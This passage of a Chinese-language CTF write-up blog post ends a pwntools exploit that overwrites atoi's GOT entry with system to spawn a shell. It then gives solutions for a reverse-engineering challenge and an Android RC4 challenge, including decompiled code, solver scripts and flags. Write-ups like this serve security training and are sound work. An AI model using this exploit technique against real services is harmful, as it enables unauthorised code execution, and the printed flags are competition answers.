+= p32(<span class="number">0x50</span>)</span><br><span class="line">payload += p32(<span class="number">0x90</span>)</span><br><span class="line">payload += p32(atoi_got)</span><br><span class="line">change_desc(<span class="string">&#x27;4&#x27;</span>, <span class="number">0x90</span>, payload + <span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line"><span class="built_in">list</span>()</span><br><span class="line">p.recvuntil(<span class="string">&quot;5: price.80, des.&quot;</span>)</span><br><span class="line">libc = ELF(<span class="string">&quot;./libc-2.23.so&quot;</span>)</span><br><span class="line">leak = u32(p.recv(<span class="number">4</span>))</span><br><span class="line">libc.address = leak - libc.symbols[<span class="string">&#x27;atoi&#x27;</span>]</span><br><span class="line">info(<span class="string">&quot;libc: &quot;</span> + <span class="built_in">hex</span>(libc.address))</span><br><span class="line">info(<span class="string">&quot;leak: &quot;</span> + <span class="built_in">hex</span>(leak))</span><br><span class="line">payload = p32(libc.symbols[<span class="string">&#x27;system&#x27;</span>])</span><br><span class="line">change_desc(<span class="string">&#x27;5&#x27;</span>, <span class="number">0x90</span>, payload + <span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">p.recvuntil(<span class="string">&quot;your choice&gt;&gt; &quot;</span>)</span><br><span class="line">p.sendline(<span class="string">&quot;sh&quot;</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<ul>
<li><h2 id="Petition"><a href="#Petition" class="headerlink" title="Petition"></a>Petition</h2>Ida 打开 发现有递归调用<br><img src="https://img-blog.csdnimg.cn/ed7e90700f474b248dc619d7f3824274.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>每个函数都十分相似<br><img src="https://img-blog.csdnimg.cn/2b5365230fb645a3836b2cd40bce3926.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>发现 7^0x66 后 ascii 码是字符‘f’ 类似的 后面都是异或即可<br>中级有一个取反的 同理取反即可<br>拿到 flag<br>Flag{96c69646-8184-4363－8de9－73f7398066c}</li>
<li><h2 id="Mobile1"><a href="#Mobile1" class="headerlink" title="Mobile1"></a>Mobile1</h2>使用 jad 进行反编译分析，发现关键进行了 rc4 加密算法。</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line">public void onCreate(Bundle bundle) &#123;</span><br><span class="line"><span class="built_in">super</span>.onCreate(bundle);</span><br><span class="line">setContentView(R.layout.activity_user);</span><br><span class="line">this.f3923o = (TextView) findViewById(R.<span class="built_in">id</span>.money_tv);</span><br><span class="line">TextView textView = (TextView) findViewById(R.<span class="built_in">id</span>.flag_tv);</span><br><span class="line">this.f3924p = (TextView) findViewById(R.<span class="built_in">id</span>.showflag_tv);</span><br><span class="line">String string = getIntent().getExtras().getString(<span class="string">&quot;TOKEN&quot;</span>);</span><br><span class="line"><span class="built_in">int</span>[] iArr = new <span class="built_in">int</span>[<span class="number">1</span>];</span><br><span class="line">byte[] bArr = C0956a.f3623b;</span><br><span class="line">byte[] <span class="built_in">bytes</span> = string.getBytes();</span><br><span class="line">ThreadLocalRandom current = ThreadLocalRandom.current();</span><br><span class="line">byte[] bytes2 = C0956a.f3622a.getBytes();</span><br><span class="line">byte[] bArr2 = new byte[<span class="number">256</span>];</span><br><span class="line"><span class="keyword">for</span> (<span class="built_in">int</span> i = <span class="number">0</span>; i &lt; <span class="number">256</span>; i++) &#123;</span><br><span class="line">bArr2[i] = (byte) i;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> (bytes2.length == <span class="number">0</span>) &#123;</span><br><span class="line">bArr2 = null;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line"><span class="built_in">int</span> i2 = <span class="number">0</span>;</span><br><span class="line"><span class="built_in">int</span> i3 = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">for</span> (<span class="built_in">int</span> i4 = <span class="number">0</span>; i4 &lt; <span class="number">256</span>; i4++) &#123;</span><br><span class="line">i3 = ((bytes2[i2] &amp; <span class="number">255</span>) + (bArr2[i4] &amp; <span class="number">255</span>) + i3) &amp; <span class="number">255</span>;</span><br><span class="line">byte b = bArr2[i4];</span><br><span class="line">public <span class="class"><span class="keyword">class</span> <span class="title">C0956a</span> &#123;</span></span><br><span class="line"><span class="class">/* <span class="title">renamed</span> <span class="title">from</span>:</span> a */</span><br><span class="line">public static String f3622a = <span class="string">&quot;secretsecretsecretsecretsecretsecret&quot;</span>;</span><br><span class="line">/* renamed <span class="keyword">from</span>: b */</span><br><span class="line">public static byte[] f3623b = &#123;<span class="number">81</span>, -<span class="number">13</span>, <span class="number">84</span>, -<span class="number">110</span>, <span class="number">72</span>, <span class="number">77</span>, -<span class="number">96</span>, <span class="number">77</span>, <span class="number">32</span>, -<span class="number">115</span>, -</span><br><span class="line"><span class="number">75</span>, -<span class="number">38</span>, -<span class="number">97</span>, <span class="number">69</span>, -<span class="number">64</span>, <span class="number">49</span>, <span class="number">8</span>, -<span class="number">27</span>, <span class="number">56</span>, <span class="number">114</span>, -<span class="number">68</span>, -<span class="number">82</span>, <span class="number">76</span>, -<span class="number">106</span>, -<span class="number">34</span>&#125;;</span><br><span class="line">&#125;</span><br><span class="line">public void onCreate(Bundle bundle) &#123;</span><br><span class="line"><span class="built_in">super</span>.onCreate(bundle);</span><br><span class="line">setContentView(R.layout.activity_main);</span><br><span class="line">C0956a.f3622a = <span class="string">&quot;5FQ5AaBGbqLGfYwjaRAuWGdDvyjbX5nH&quot;</span>;</span><br><span class="line">public void onClick(View view) &#123;</span><br><span class="line">String <span class="built_in">str</span>;</span><br><span class="line"><span class="keyword">if</span> (this.f3925b[<span class="number">0</span>] &gt; <span class="number">499999999</span>) &#123;</span><br><span class="line">Toast.makeText(UserActivity.this, <span class="string">&quot;buy success, eojoy it!&quot;</span>, <span class="number">0</span>).show();</span><br><span class="line">byte[] bArr = &#123;<span class="number">102</span>, <span class="number">108</span>, <span class="number">97</span>, <span class="number">103</span>, <span class="number">123</span>&#125;; // flag&#123;</span><br><span class="line">byte[] bArr2 = &#123;<span class="number">125</span>&#125;; // &#125;</span><br><span class="line">byte[] bArr3 = &#123;<span class="number">15</span>, <span class="number">70</span>, <span class="number">3</span>, <span class="number">41</span>, <span class="number">1</span>, <span class="number">48</span>, <span class="number">35</span>, <span class="number">64</span>, <span class="number">58</span>, <span class="number">50</span>, <span class="number">0</span>, <span class="number">101</span>, <span class="number">100</span>, <span class="number">99</span>, <span class="number">11</span>, <span class="number">123</span>, </span><br><span class="line"><span class="number">52</span>, <span class="number">8</span>, <span class="number">60</span>, <span class="number">119</span>, <span class="number">62</span>, <span class="number">115</span>, <span class="number">73</span>, <span class="number">17</span>, <span class="number">16</span>&#125;;</span><br><span class="line">byte[] <span class="built_in">bytes</span> = this.f3926c.getBytes();</span><br><span class="line"><span class="keyword">if</span> (<span class="number">25</span> &gt; <span class="built_in">bytes</span>.length) &#123;</span><br><span class="line"><span class="built_in">str</span> = <span class="string">&quot;&quot;</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line"><span class="keyword">for</span> (<span class="built_in">int</span> i = <span class="number">0</span>; i &lt; <span class="number">25</span>; i++) &#123;</span><br><span class="line">bArr3[i] = (byte) (bArr3[i] ^ <span class="built_in">bytes</span>[i]);</span><br><span class="line">&#125;</span><br><span class="line"><span class="built_in">str</span> = new String(bArr) + new String(bArr3) + new String(bArr2);</span><br><span class="line">&#125;</span><br><span class="line">$ cat areyourich.py </span><br><span class="line"><span class="keyword">from</span> arc4 <span class="keyword">import</span> ARC4</span><br><span class="line">a=[<span class="number">81</span>, -<span class="number">13</span>, <span class="number">84</span>, -<span class="number">110</span>, <span class="number">72</span>, <span class="number">77</span>, -<span class="number">96</span>, <span class="number">77</span>, <span class="number">32</span>, -<span class="number">115</span>, -<span class="number">75</span>, -<span class="number">38</span>, -<span class="number">97</span>, <span class="number">69</span>, -<span class="number">64</span>, <span class="number">49</span>, <span class="number">8</span>, </span><br><span class="line">-<span class="number">27</span>, <span class="number">56</span>, <span class="number">114</span>, -<span class="number">68</span>, -<span class="number">82</span>, <span class="number">76</span>, -<span class="number">106</span>, -<span class="number">34</span>]</span><br><span class="line">c=<span class="string">&#x27;&#x27;</span>.join([<span class="built_in">chr</span>((<span class="number">256</span>+i)%<span class="number">256</span>) <span class="keyword">for</span> i <span class="keyword">in</span> a])</span><br><span class="line">b=[<span class="number">15</span>, <span class="number">70</span>, <span class="number">3</span>, <span class="number">41</span>, <span class="number">1</span>, <span class="number">48</span>, <span class="number">35</span>, <span class="number">64</span>, <span class="number">58</span>, <span class="number">50</span>, <span class="number">0</span>, <span class="number">101</span>, <span class="number">100</span>, <span class="number">99</span>, <span class="number">11</span>, <span class="number">123</span>, <span class="number">52</span>, <span class="number">8</span>, <span class="number">60</span>, </span><br><span class="line"><span class="number">119</span>, <span class="number">62</span>, <span class="number">115</span>, <span class="number">73</span>, <span class="number">17</span>, <span class="number">16</span>]</span><br><span class="line">arc4 = ARC4(<span class="string">&#x27;5FQ5AaBGbqLGfYwjaRAuWGdDvyjbX5nH&#x27;</span>)</span><br><span class="line">name = arc4.encrypt(c)</span><br><span class="line"><span class="built_in">print</span>(name)</span><br><span class="line">flag = <span class="string">&#x27;&#x27;</span>.join([<span class="built_in">chr</span>(<span class="built_in">ord</span>(x)^y) <span class="keyword">for</span> x,y <span class="keyword">in</span> <span class="built_in">zip</span>(name, b)])</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;flag&#123;&quot;</span> + flag + <span class="string">&quot;&#125;&quot;</span>)</span><br></pre></td></tr></table></figure>
<p>$ python areyourich.py<br>vvvvipuser_TTTTKRWQGP@001<br>flag{y0u_h@V3_@_107_0f_m0n3y!!}</p>

      
    </div>
    
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2022/01/05/BUU-Crypto-RSA1/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">RSA1</div>
      <strong class="article-nav-caption">&gt;</strong>
    </a>
  
</nav>

  
</article>


<div class="ds-share share" data-thread-key="首届“鹤城杯”河南·鹤壁CTF网络安全挑战赛部分WP" data-title="首届“鹤城杯”河南·鹤壁CTF网络安全挑战赛WP" data-url="http://example.com/2022/01/05/%E9%A6%96%E5%B1%8A%E2%80%9C%E9%B9%A4%E5%9F%8E%E6%9D%AF%E2%80%9D%E6%B2%B3%E5%8D%97%C2%B7%E9%B9%A4%E5%A3%81CTF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8C%91%E6%88%98%E8%B5%9B%E9%83%A8%E5%88%86WP/"  data-images="D:/比赛/博客搭建/Hexo/public/img/head.jpg" data-content="首届“鹤城杯”河南·鹤壁CTF网络安全挑战赛WP">
    <div class="ds-share-inline">
      <ul  class="ds-share-icons-16">
      	<li data-toggle="ds-share-icons-more"><a class="ds-more" href="javascript:void(0);">分享到：</a></li>
        <li><a class="ds-weibo" href="javascript:void(0);" data-service="weibo">微博</a></li>
        <li><a class="ds-qzone" href="javascript:void(0);" data-service="qzone">QQ空间</a></li>
        <li><a class="ds-qqt" href="javascript:void(0);" data-service="qqt">腾讯微博</a></li>
        <li><a class="ds-wechat" href="javascript:void(0);" data-service="wechat">微信</a></li>
      </ul>
      <div class="ds-share-icons-more">
      </div>
    </div>
 </div>
 





</div>
      <footer id="footer">
  <div class="outer">
    <div id="footer-info">
      <div class="footer-left">
        &copy; 2022 John Doe
      </div>
        <div class="footer-right">
          <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/smackgg/hexo-theme-smackdown" target="_blank">Smackdown</a>
        </div>
    </div>
  </div>
</footer>
    </div>
    
  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">



<script>
	var yiliaConfig = {
		fancybox: true,
		mathjax: true,
		animate: true,
		isHome: false,
		isPost: true,
		isArchive: false,
		isTag: false,
		isCategory: false,
		open_in_new: false
	}
</script>

<script src="/js/main.js"></script>




<script type="text/x-mathjax-config">
MathJax.Hub.Config({
    tex2jax: {
        inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
        processEscapes: true,
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    }
});

MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
        all[i].SourceElement().parentNode.className += ' has-jax';                 
    }       
});
</script>

<script src="//cdn.bootcss.com/mathjax/2.7.0/MathJax.js"></script>


  </div>
</body>
</html>